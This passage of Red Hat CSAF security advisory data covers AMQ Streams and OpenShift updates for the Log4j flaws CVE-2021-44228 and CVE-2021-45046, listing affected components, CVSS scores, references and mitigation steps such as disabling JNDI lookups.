"8Base-OSE-LOGGING-5.2:openshift-logging/kibana6-rhel8@sha256:a2d914120d489c00d8d8c40cf9f1fa1ba627c5e386fc113ae9299113dee253ca_amd64",
"8Base-OSE-LOGGING-5.2:openshift-logging/kibana6-rhel8@sha256:d5c47750ae81e99b3cc4f9f71127cb394b69b747177c08c53768df8b8b52ba65_ppc64le",
"8Base-OSE-LOGGING-5.2:openshift-logging/kibana6-rhel8@sha256:d7fa8453d07409cd344cde67e772fb4d2941398b853ce1ea3bcaf6135d5645c1_s390x",
"8Base-OSE-LOGGING-5.2:openshift-logging/log-file-metric-exporter-rhel8@sha256:67e23735a1005bb7f06d3f05677bfe8c38bccc5bfc1cc4cf16832ddeda29931a_s390x",
"8Base-OSE-LOGGING-5.2:openshift-logging/log-file-metric-exporter-rhel8@sha256:9c2decd7838d0e1a56c27ff7fa8af82ed2ac33d0618240b80d26fd932f5804f2_amd64",
"8Base-OSE-LOGGING-5.2:openshift-logging/log-file-metric-exporter-rhel8@sha256:cb884b83fecaa7d6f4aae548fd299568edf59feb5d752704dcd4598b1f826ff1_ppc64le",
"8Base-OSE-LOGGING-5.2:openshift-logging/logging-curator5-rhel8@sha256:1982a509b8a209720b92fba4812a3fcc5ce0e519908cdec876beb92f895699fa_amd64",
"8Base-OSE-LOGGING-5.2:openshift-logging/logging-curator5-rhel8@sha256:66e46f68e5313e4f58cfd3b6fccb8edeb97a574210bff799d0bd5471b73f9f62_s390x",
"8Base-OSE-LOGGING-5.2:openshift-logging/logging-curator5-rhel8@sha256:d3b3ab31d012a82acb832e705f1a5ba60912d1b32dd035fad9106f1088de35a8_ppc64le"
]
}
],
"threats": [
{
"category": "exploit_status",
"date": "2023-05-01T00:00:00+00:00",
"details": "CISA: https://www.cisa.gov/known-exploited-vulnerabilities-catalog"
},
{
"category": "impact",
"details": "Moderate"
}
],
"title": "log4j-core: DoS in log4j 2.x with thread context message pattern and context lookup pattern (incomplete fix for CVE-2021-44228)"
}
]
}
rhsa-2021_5138
Vulnerability from csaf_redhat
Published
2021-12-14 21:49
Modified
2024-12-12 01:18
Summary
Red Hat Security Advisory: Red Hat AMQ Streams 1.8.4 release and security update
Notes
Topic
Red Hat AMQ Streams 1.8.4 is now available from the Red Hat Customer Portal.
Red Hat Product Security has rated this update as having a security impact of Critical. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.
Details
Red Hat AMQ Streams, based on the Apache Kafka project, offers a distributed backbone that allows microservices and other applications to share data with extremely high throughput and extremely low latency.
This release of Red Hat AMQ Streams 1.8.4 serves as a replacement for Red Hat AMQ Streams 1.8.0, and includes security and bug fixes, and enhancements.
Security Fix(es):
* log4j-core: Remote code execution in Log4j 2.x when logs contain an attacker-controlled string value (CVE-2021-44228)
For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.
Terms of Use
This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.
{
"document": {
"aggregate_severity": {
"namespace": "https://access.redhat.com/security/updates/classification/",
"text": "Critical"
},
"category": "csaf_security_advisory",
"csaf_version": "2.0",
"distribution": {
"text": "Copyright \u00a9 Red Hat, Inc. All rights reserved.",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en",
"notes": [
{
"category": "summary",
"text": "Red Hat AMQ Streams 1.8.4 is now available from the Red Hat Customer Portal.\n\nRed Hat Product Security has rated this update as having a security impact of Critical. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.",
"title": "Topic"
},
{
"category": "general",
"text": "Red Hat AMQ Streams, based on the Apache Kafka project, offers a distributed backbone that allows microservices and other applications to share data with extremely high throughput and extremely low latency. \n\nThis release of Red Hat AMQ Streams 1.8.4 serves as a replacement for Red Hat AMQ Streams 1.8.0, and includes security and bug fixes, and enhancements.\n\nSecurity Fix(es):\n\n* log4j-core: Remote code execution in Log4j 2.x when logs contain an attacker-controlled string value (CVE-2021-44228)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.",
"title": "Details"
},
{
"category": "legal_disclaimer",
"text": "This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.",
"title": "Terms of Use"
}
],
"publisher": {
"category": "vendor",
"contact_details": "https://access.redhat.com/security/team/contact/",
"issuing_authority": "Red Hat Product Security is responsible for vulnerability handling across all Red Hat products and services.",
"name": "Red Hat Product Security",
"namespace": "https://www.redhat.com"
},
"references": [
{
"category": "self",
"summary": "https://access.redhat.com/errata/RHSA-2021:5138",
"url": "https://access.redhat.com/errata/RHSA-2021:5138"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/updates/classification/#critical",
"url": "https://access.redhat.com/security/updates/classification/#critical"
},
{
"category": "external",
"summary": "https://access.redhat.com/jbossnetwork/restricted/listSoftware.html?downloadType=distributions\u0026product=jboss.amq.streams\u0026version=1.8.4",
"url": "https://access.redhat.com/jbossnetwork/restricted/listSoftware.html?downloadType=distributions\u0026product=jboss.amq.streams\u0026version=1.8.4"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/vulnerabilities/RHSB-2021-009",
"url": "https://access.redhat.com/security/vulnerabilities/RHSB-2021-009"
},
{
"category": "external",
"summary": "2030932",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2030932"
},
{
"category": "self",
"summary": "Canonical URL",
"url": "https://security.access.redhat.com/data/csaf/v2/advisories/2021/rhsa-2021_5138.json"
}
],
"title": "Red Hat Security Advisory: Red Hat AMQ Streams 1.8.4 release and security update",
"tracking": {
"current_release_date": "2024-12-12T01:18:37+00:00",
"generator": {
"date": "2024-12-12T01:18:37+00:00",
"engine": {
"name": "Red Hat SDEngine",
"version": "4.2.3"
}
},
"id": "RHSA-2021:5138",
"initial_release_date": "2021-12-14T21:49:01+00:00",
"revision_history": [
{
"date": "2021-12-14T21:49:01+00:00",
"number": "1",
"summary": "Initial version"
},
{
"date": "2021-12-14T21:49:01+00:00",
"number": "2",
"summary": "Last updated version"
},
{
"date": "2024-12-12T01:18:37+00:00",
"number": "3",
"summary": "Last generated version"
}
],
"status": "final",
"version": "3"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_name",
"name": "Red Hat AMQ Streams 1.8.4",
"product": {
"name": "Red Hat AMQ Streams 1.8.4",
"product_id": "Red Hat AMQ Streams 1.8.4",
"product_identification_helper": {
"cpe": "cpe:/a:redhat:amq_streams:1"
}
}
}
],
"category": "product_family",
"name": "Red Hat JBoss AMQ"
}
],
"category": "vendor",
"name": "Red Hat"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2021-44228",
"cwe": {
"id": "CWE-20",
"name": "Improper Input Validation"
},
"discovery_date": "2021-12-10T00:00:00+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2030932"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in the Apache Log4j logging library in versions from 2.0.0 and before 2.15.0. A remote attacker who can control log messages or log message parameters, can execute arbitrary code on the server via JNDI LDAP endpoint.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "log4j-core: Remote code execution in Log4j 2.x when logs contain an attacker-controlled string value",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "This issue only affects log4j versions between 2.0 and 2.14.1. In order to exploit this flaw you need:\n- A remotely accessible endpoint with any protocol (HTTP, TCP, etc) that allows an attacker to send arbitrary data,\n- A log statement in the endpoint that logs the attacker controlled data.\n\nIn Red Hat OpenShift Logging the vulnerable log4j library is shipped in the Elasticsearch components. Because Elasticsearch is not susceptible to remote code execution with this vulnerability due to use of the Java Security Manager and because access to these components is limited, the impact by this vulnerability is reduced to Moderate.\n\nAs per upstream applications using Log4j 1.x may be impacted by this flaw if their configuration uses JNDI. However, the risk is much lower. This flaw in Log4j 1.x is tracked via https://access.redhat.com/security/cve/CVE-2021-4104 and has been rated as having Moderate security impact.\n\nCodeReady Studio version 12.21.1 was released containing a fix for this vulnerability.\n\nThe following products are NOT affected by this flaw and have been explicitly listed here for the benefit of our customers.\n- Red Hat Enterprise Linux\n- Red Hat Advanced Cluster Management for Kubernetes \n- Red Hat Advanced Cluster Security for Kubernetes\n- Red Hat Ansible Automation Platform (Engine and Tower)\n- Red Hat Certificate System\n- Red Hat Directory Server\n- Red Hat Identity Management\n- Red Hat CloudForms \n- Red Hat Update Infrastructure\n- Red Hat Satellite\n- Red Hat Ceph Storage\n- Red Hat Gluster Storage\n- Red Hat OpenShift Data Foundation\n- Red Hat OpenStack Platform\n- Red Hat Virtualization\n- Red Hat Single Sign-On\n- Red Hat 3scale API Management",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat AMQ Streams 1.8.4"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2021-44228"
},
{
"category": "external",
"summary": "RHBZ#2030932",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2030932"
},
{
"category": "external",
"summary": "RHSB-2021-009",
"url": "https://access.redhat.com/security/vulnerabilities/RHSB-2021-009"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2021-44228",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-44228"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2021-44228",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2021-44228"
},
{
"category": "external",
"summary": "https://github.com/advisories/GHSA-jfh8-c2jp-5v3q",
"url": "https://github.com/advisories/GHSA-jfh8-c2jp-5v3q"
},
{
"category": "external",
"summary": "https://logging.apache.org/log4j/2.x/security.html",
"url": "https://logging.apache.org/log4j/2.x/security.html"
},
{
"category": "external",
"summary": "https://www.lunasec.io/docs/blog/log4j-zero-day/",
"url": "https://www.lunasec.io/docs/blog/log4j-zero-day/"
},
{
"category": "external",
"summary": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog",
"url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog"
}
],
"release_date": "2021-12-10T02:01:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2021-12-14T21:49:01+00:00",
"details": "Before applying the update, back up your existing installation, including all applications, configuration files, databases and database settings, and so on.\n\nThe References section of this erratum contains a download link (you must log in to download the update).",
"product_ids": [
"Red Hat AMQ Streams 1.8.4"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2021:5138"
},
{
"category": "workaround",
"details": "For Log4j versions \u003e=2.10\nset the system property log4j2.formatMsgNoLookups or the environment variable LOG4J_FORMAT_MSG_NO_LOOKUPS to true\n\nFor Log4j versions \u003e=2.7 and \u003c=2.14.1\nall PatternLayout patterns can be modified to specify the message converter as %m{nolookups} instead of just %m\n\nFor Log4j versions \u003e=2.0-beta9 and \u003c=2.10.0\nremove the JndiLookup class from the classpath. For example: \n```\nzip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class\n```\n\nOn OpenShift 4 and in OpenShift Logging, the above mitigation can be applied by following the steps in this article: https://access.redhat.com/solutions/6578421\n\nOn OpenShift 3.11, mitigation to the affected Elasticsearch component can be applied by following the steps in this article: https://access.redhat.com/solutions/6578441",
"product_ids": [
"Red Hat AMQ Streams 1.8.4"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"Red Hat AMQ Streams 1.8.4"
]
}
],
"threats": [
{
"category": "exploit_status",
"date": "2021-12-10T00:00:00+00:00",
"details": "CISA: https://www.cisa.gov/known-exploited-vulnerabilities-catalog"
},
{
"category": "impact",
"details": "Critical"
}
],
"title": "log4j-core: Remote code execution in Log4j 2.x when logs contain an attacker-controlled string value"
}
]
}
rhsa-2021_5108
Vulnerability from csaf_redhat
Published
2021-12-14 15:09
Modified
2024-12-12 01:17
Summary
Red Hat Security Advisory: OpenShift Container Platform 4.8.z security update
Notes
Topic
Red Hat OpenShift Container Platform release 4.8.z is now available with
updates to packages and images that fix several bugs and add enhancements.
Red Hat Product Security has rated this update as having a security impact
of Critical. A Common Vulnerability Scoring System (CVSS) base score, which
gives a detailed severity rating, is available for each vulnerability from
the CVE link(s) in the References section.
Details
Red Hat OpenShift Container Platform is Red Hat's cloud computing
Kubernetes application platform solution designed for on-premise or private
cloud deployments.
Security Fix(es):
* log4j-core: Remote code execution in Log4j 2.x when logs contain an
attacker-controlled string value (CVE-2021-44228)
For more details about the security issue(s), including the impact, a CVSS
score, acknowledgments, and other related information, refer to the CVE
page(s)
listed in the References section.
Terms of Use
This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.
{
"document": {
"aggregate_severity": {
"namespace": "https://access.redhat.com/security/updates/classification/",
"text": "Critical"
},
"category": "csaf_security_advisory",
"csaf_version": "2.0",
"distribution": {
"text": "Copyright \u00a9 Red Hat, Inc. All rights reserved.",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en",
"notes": [
{
"category": "summary",
"text": "Red Hat OpenShift Container Platform release 4.8.z is now available with\nupdates to packages and images that fix several bugs and add enhancements.\n\nRed Hat Product Security has rated this update as having a security impact\nof Critical. A Common Vulnerability Scoring System (CVSS) base score, which\ngives a detailed severity rating, is available for each vulnerability from\nthe CVE link(s) in the References section.",
"title": "Topic"
},
{
"category": "general",
"text": "Red Hat OpenShift Container Platform is Red Hat\u0027s cloud computing\nKubernetes application platform solution designed for on-premise or private\ncloud deployments.\nSecurity Fix(es):\n\n* log4j-core: Remote code execution in Log4j 2.x when logs contain an\nattacker-controlled string value (CVE-2021-44228)\n\nFor more details about the security issue(s), including the impact, a CVSS\nscore, acknowledgments, and other related information, refer to the CVE\npage(s)\nlisted in the References section.",
"title": "Details"
},
{
"category": "legal_disclaimer",
"text": "This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.",
"title": "Terms of Use"
}
],
"publisher": {
"category": "vendor",
"contact_details": "https://access.redhat.com/security/team/contact/",
"issuing_authority": "Red Hat Product Security is responsible for vulnerability handling across all Red Hat products and services.",
"name": "Red Hat Product Security",
"namespace": "https://www.redhat.com"
},
"references": [
{
"category": "self",
"summary": "https://access.redhat.com/errata/RHSA-2021:5108",
"url": "https://access.redhat.com/errata/RHSA-2021:5108"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/updates/classification/#critical",
"url": "https://access.redhat.com/security/updates/classification/#critical"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/vulnerabilities/RHSB-2021-009",
"url": "https://access.redhat.com/security/vulnerabilities/RHSB-2021-009"
},
{
"category": "external",
"summary": "2030932",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2030932"
},
{
"category": "self",
"summary": "Canonical URL",
"url": "https://security.access.redhat.com/data/csaf/v2/advisories/2021/rhsa-2021_5108.json"
}
],
"title": "Red Hat Security Advisory: OpenShift Container Platform 4.8.z security update",
"tracking": {
"current_release_date": "2024-12-12T01:17:10+00:00",
"generator": {
"date": "2024-12-12T01:17:10+00:00",
"engine": {
"name": "Red Hat SDEngine",
"version": "4.2.3"
}
},
"id": "RHSA-2021:5108",
"initial_release_date": "2021-12-14T15:09:31+00:00",
"revision_history": [
{
"date": "2021-12-14T15:09:31+00:00",
"number": "1",
"summary": "Initial version"
},
{
"date": "2021-12-14T15:09:31+00:00",
"number": "2",
"summary": "Last updated version"
},
{
"date": "2024-12-12T01:17:10+00:00",
"number": "3",
"summary": "Last generated version"
}
],
"status": "final",
"version": "3"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_name",
"name": "Red Hat OpenShift Container Platform 4.8",
"product": {
"name": "Red Hat OpenShift Container Platform 4.8",
"product_id": "8Base-RHOSE-4.8",
"product_identification_helper": {
"cpe": "cpe:/a:redhat:openshift:4.8::el8"
}
}
}
],
"category": "product_family",
"name": "Red Hat OpenShift Enterprise"
},
{
"branches": [
{
"category": "product_version",
"name": "openshift4/ose-metering-hive@sha256:7518a86bfa6ccd14de18dcd833fa9dfee36a3707e70e9ffa2218264bac6e7794_amd64",
"product": {
"name": "openshift4/ose-metering-hive@sha256:7518a86bfa6ccd14de18dcd833fa9dfee36a3707e70e9ffa2218264bac6e7794_amd64",
"product_id": "openshift4/ose-metering-hive@sha256:7518a86bfa6ccd14de18dcd833fa9dfee36a3707e70e9ffa2218264bac6e7794_amd64",
"product_identification_helper": {
"purl": "pkg:oci/ose-metering-hive@sha256:7518a86bfa6ccd14de18dcd833fa9dfee36a3707e70e9ffa2218264bac6e7794?arch=amd64\u0026repository_url=registry.redhat.io/openshift4/ose-metering-hive\u0026tag=v4.8.0-202112132154.p0.g57dd03a.assembly.stream"
}
}
},
{
"category": "product_version",
"name": "openshift4/ose-metering-ansible-operator@sha256:bae1a96311e2cac42a709789181bef11f7edf3b8c8feccbbc55552c2c14ea80d_amd64",
"product": {
"name": "openshift4/ose-metering-ansible-operator@sha256:bae1a96311e2cac42a709789181bef11f7edf3b8c8feccbbc55552c2c14ea80d_amd64",
"product_id": "openshift4/ose-metering-ansible-operator@sha256:bae1a96311e2cac42a709789181bef11f7edf3b8c8feccbbc55552c2c14ea80d_amd64",
"product_identification_helper": {
"purl": "pkg:oci/ose-metering-ansible-operator@sha256:bae1a96311e2cac42a709789181bef11f7edf3b8c8feccbbc55552c2c14ea80d?arch=amd64\u0026repository_url=registry.redhat.io/openshift4/ose-metering-ansible-operator\u0026tag=v4.8.0-202112132154.p0.g0d7ecfb.assembly.stream"
}
}
},
{
"category": "product_version",
"name": "openshift4/ose-metering-ansible-operator-bundle@sha256:3b7c190204a5ffb038b60b80e2096a7fab508dfeafdafeff71e755802265e70a_amd64",
"product": {
"name": "openshift4/ose-metering-ansible-operator-bundle@sha256:3b7c190204a5ffb038b60b80e2096a7fab508dfeafdafeff71e755802265e70a_amd64",
"product_id": "openshift4/ose-metering-ansible-operator-bundle@sha256:3b7c190204a5ffb038b60b80e2096a7fab508dfeafdafeff71e755802265e70a_amd64",
"product_identification_helper": {
"purl": "pkg:oci/ose-metering-ansible-operator-bundle@sha256:3b7c190204a5ffb038b60b80e2096a7fab508dfeafdafeff71e755802265e70a?arch=amd64\u0026repository_url=registry.redhat.io/openshift4/ose-metering-ansible-operator-bundle\u0026tag=v4.8.0.202112132154.p0.g0d7ecfb.assembly.stream-1"
}
}
}
],
"category": "architecture",
"name": "amd64"
}
],
"category": "vendor",
"name": "Red Hat"
}
],
"relationships": [
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift4/ose-metering-ansible-operator-bundle@sha256:3b7c190204a5ffb038b60b80e2096a7fab508dfeafdafeff71e755802265e70a_amd64 as a component of Red Hat OpenShift Container Platform 4.8",
"product_id": "8Base-RHOSE-4.8:openshift4/ose-metering-ansible-operator-bundle@sha256:3b7c190204a5ffb038b60b80e2096a7fab508dfeafdafeff71e755802265e70a_amd64"
},
"product_reference": "openshift4/ose-metering-ansible-operator-bundle@sha256:3b7c190204a5ffb038b60b80e2096a7fab508dfeafdafeff71e755802265e70a_amd64",
"relates_to_product_reference": "8Base-RHOSE-4.8"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift4/ose-metering-ansible-operator@sha256:bae1a96311e2cac42a709789181bef11f7edf3b8c8feccbbc55552c2c14ea80d_amd64 as a component of Red Hat OpenShift Container Platform 4.8",
"product_id": "8Base-RHOSE-4.8:openshift4/ose-metering-ansible-operator@sha256:bae1a96311e2cac42a709789181bef11f7edf3b8c8feccbbc55552c2c14ea80d_amd64"
},
"product_reference": "openshift4/ose-metering-ansible-operator@sha256:bae1a96311e2cac42a709789181bef11f7edf3b8c8feccbbc55552c2c14ea80d_amd64",
"relates_to_product_reference": "8Base-RHOSE-4.8"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift4/ose-metering-hive@sha256:7518a86bfa6ccd14de18dcd833fa9dfee36a3707e70e9ffa2218264bac6e7794_amd64 as a component of Red Hat OpenShift Container Platform 4.8",
"product_id": "8Base-RHOSE-4.8:openshift4/ose-metering-hive@sha256:7518a86bfa6ccd14de18dcd833fa9dfee36a3707e70e9ffa2218264bac6e7794_amd64"
},
"product_reference": "openshift4/ose-metering-hive@sha256:7518a86bfa6ccd14de18dcd833fa9dfee36a3707e70e9ffa2218264bac6e7794_amd64",
"relates_to_product_reference": "8Base-RHOSE-4.8"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2021-44228",
"cwe": {
"id": "CWE-20",
"name": "Improper Input Validation"
},
"discovery_date": "2021-12-10T00:00:00+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"8Base-RHOSE-4.8:openshift4/ose-metering-ansible-operator-bundle@sha256:3b7c190204a5ffb038b60b80e2096a7fab508dfeafdafeff71e755802265e70a_amd64",
"8Base-RHOSE-4.8:openshift4/ose-metering-ansible-operator@sha256:bae1a96311e2cac42a709789181bef11f7edf3b8c8feccbbc55552c2c14ea80d_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2030932"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in the Apache Log4j logging library in versions from 2.0.0 and before 2.15.0. A remote attacker who can control log messages or log message parameters, can execute arbitrary code on the server via JNDI LDAP endpoint.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "log4j-core: Remote code execution in Log4j 2.x when logs contain an attacker-controlled string value",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "This issue only affects log4j versions between 2.0 and 2.14.1. In order to exploit this flaw you need:\n- A remotely accessible endpoint with any protocol (HTTP, TCP, etc) that allows an attacker to send arbitrary data,\n- A log statement in the endpoint that logs the attacker controlled data.\n\nIn Red Hat OpenShift Logging the vulnerable log4j library is shipped in the Elasticsearch components. Because Elasticsearch is not susceptible to remote code execution with this vulnerability due to use of the Java Security Manager and because access to these components is limited, the impact by this vulnerability is reduced to Moderate.\n\nAs per upstream applications using Log4j 1.x may be impacted by this flaw if their configuration uses JNDI. However, the risk is much lower. This flaw in Log4j 1.x is tracked via https://access.redhat.com/security/cve/CVE-2021-4104 and has been rated as having Moderate security impact.\n\nCodeReady Studio version 12.21.1 was released containing a fix for this vulnerability.\n\nThe following products are NOT affected by this flaw and have been explicitly listed here for the benefit of our customers.\n- Red Hat Enterprise Linux\n- Red Hat Advanced Cluster Management for Kubernetes \n- Red Hat Advanced Cluster Security for Kubernetes\n- Red Hat Ansible Automation Platform (Engine and Tower)\n- Red Hat Certificate System\n- Red Hat Directory Server\n- Red Hat Identity Management\n- Red Hat CloudForms \n- Red Hat Update Infrastructure\n- Red Hat Satellite\n- Red Hat Ceph Storage\n- Red Hat Gluster Storage\n- Red Hat OpenShift Data Foundation\n- Red Hat OpenStack Platform\n- Red Hat Virtualization\n- Red Hat Single Sign-On\n- Red Hat 3scale API Management",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"8Base-RHOSE-4.8:openshift4/ose-metering-hive@sha256:7518a86bfa6ccd14de18dcd833fa9dfee36a3707e70e9ffa2218264bac6e7794_amd64"
],
"known_not_affected": [
"8Base-RHOSE-4.8:openshift4/ose-metering-ansible-operator-bundle@sha256:3b7c190204a5ffb038b60b80e2096a7fab508dfeafdafeff71e755802265e70a_amd64",
"8Base-RHOSE-4.8:openshift4/ose-metering-ansible-operator@sha256:bae1a96311e2cac42a709789181bef11f7edf3b8c8feccbbc55552c2c14ea80d_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2021-44228"
},
{
"category": "external",
"summary": "RHBZ#2030932",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2030932"
},
{
"category": "external",
"summary": "RHSB-2021-009",
"url": "https://access.redhat.com/security/vulnerabilities/RHSB-2021-009"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2021-44228",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-44228"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2021-44228",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2021-44228"
},
{
"category": "external",
"summary": "https://github.com/advisories/GHSA-jfh8-c2jp-5v3q",
"url": "https://github.com/advisories/GHSA-jfh8-c2jp-5v3q"
},
{
"category": "external",
"summary": "https://logging.apache.org/log4j/2.x/security.html",
"url": "https://logging.apache.org/log4j/2.x/security.html"
},
{
"category": "external",
"summary": "https://www.lunasec.io/docs/blog/log4j-zero-day/",
"url": "https://www.lunasec.io/docs/blog/log4j-zero-day/"
},
{
"category": "external",
"summary": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog",
"url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog"
}
],
"release_date": "2021-12-10T02:01:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2021-12-14T15:09:31+00:00",
"details": "For OpenShift Container Platform 4.8 see the following documentation, which\nwill be updated shortly for this release, for important instructions on how\nto upgrade your cluster and fully apply this asynchronous errata update:\n\nhttps://docs.openshift.com/container-platform/4.8/release_notes/ocp-4-8-release-notes.html\n\nDetails on how to access this content are available at\nhttps://docs.openshift.com/container-platform/4.8/updating/updating-cluster-cli.html",
"product_ids": [
"8Base-RHOSE-4.8:openshift4/ose-metering-hive@sha256:7518a86bfa6ccd14de18dcd833fa9dfee36a3707e70e9ffa2218264bac6e7794_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2021:5108"
},
{
"category": "workaround",
"details": "For Log4j versions \u003e=2.10\nset the system property log4j2.formatMsgNoLookups or the environment variable LOG4J_FORMAT_MSG_NO_LOOKUPS to true\n\nFor Log4j versions \u003e=2.7 and \u003c=2.14.1\nall PatternLayout patterns can be modified to specify the message converter as %m{nolookups} instead of just %m\n\nFor Log4j versions \u003e=2.0-beta9 and \u003c=2.10.0\nremove the JndiLookup class from the classpath. For example: \n```\nzip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class\n```\n\nOn OpenShift 4 and in OpenShift Logging, the above mitigation can be applied by following the steps in this article: https://access.redhat.com/solutions/6578421\n\nOn OpenShift 3.11, mitigation to the affected Elasticsearch component can be applied by following the steps in this article: https://access.redhat.com/solutions/6578441",
"product_ids": [
"8Base-RHOSE-4.8:openshift4/ose-metering-ansible-operator-bundle@sha256:3b7c190204a5ffb038b60b80e2096a7fab508dfeafdafeff71e755802265e70a_amd64",
"8Base-RHOSE-4.8:openshift4/ose-metering-ansible-operator@sha256:bae1a96311e2cac42a709789181bef11f7edf3b8c8feccbbc55552c2c14ea80d_amd64",
"8Base-RHOSE-4.8:openshift4/ose-metering-hive@sha256:7518a86bfa6ccd14de18dcd833fa9dfee36a3707e70e9ffa2218264bac6e7794_amd64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"8Base-RHOSE-4.8:openshift4/ose-metering-ansible-operator-bundle@sha256:3b7c190204a5ffb038b60b80e2096a7fab508dfeafdafeff71e755802265e70a_amd64",
"8Base-RHOSE-4.8:openshift4/ose-metering-ansible-operator@sha256:bae1a96311e2cac42a709789181bef11f7edf3b8c8feccbbc55552c2c14ea80d_amd64",
"8Base-RHOSE-4.8:openshift4/ose-metering-hive@sha256:7518a86bfa6ccd14de18dcd833fa9dfee36a3707e70e9ffa2218264bac6e7794_amd64"
]
}
],
"threats": [
{
"category": "exploit_status",
"date": "2021-12-10T00:00:00+00:00",
"details": "CISA: https://www.cisa.gov/known-exploited-vulnerabilities-catalog"
},
{
"category": "impact",
"details": "Critical"
}
],
"title": "log4j-core: Remote code execution in Log4j 2.x when logs contain an attacker-controlled string value"
},
{
"cve": "CVE-2021-45046",
"cwe": {
"id": "CWE-400",
"name": "Uncontrolled Resource Consumption"
},
"discovery_date": "2021-12-14T00:00:00+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"8Base-RHOSE-4.8:openshift4/ose-metering-ansible-operator-bundle@sha256:3b7c190204a5ffb038b60b80e2096a7fab508dfeafdafeff71e755802265e70a_amd64",
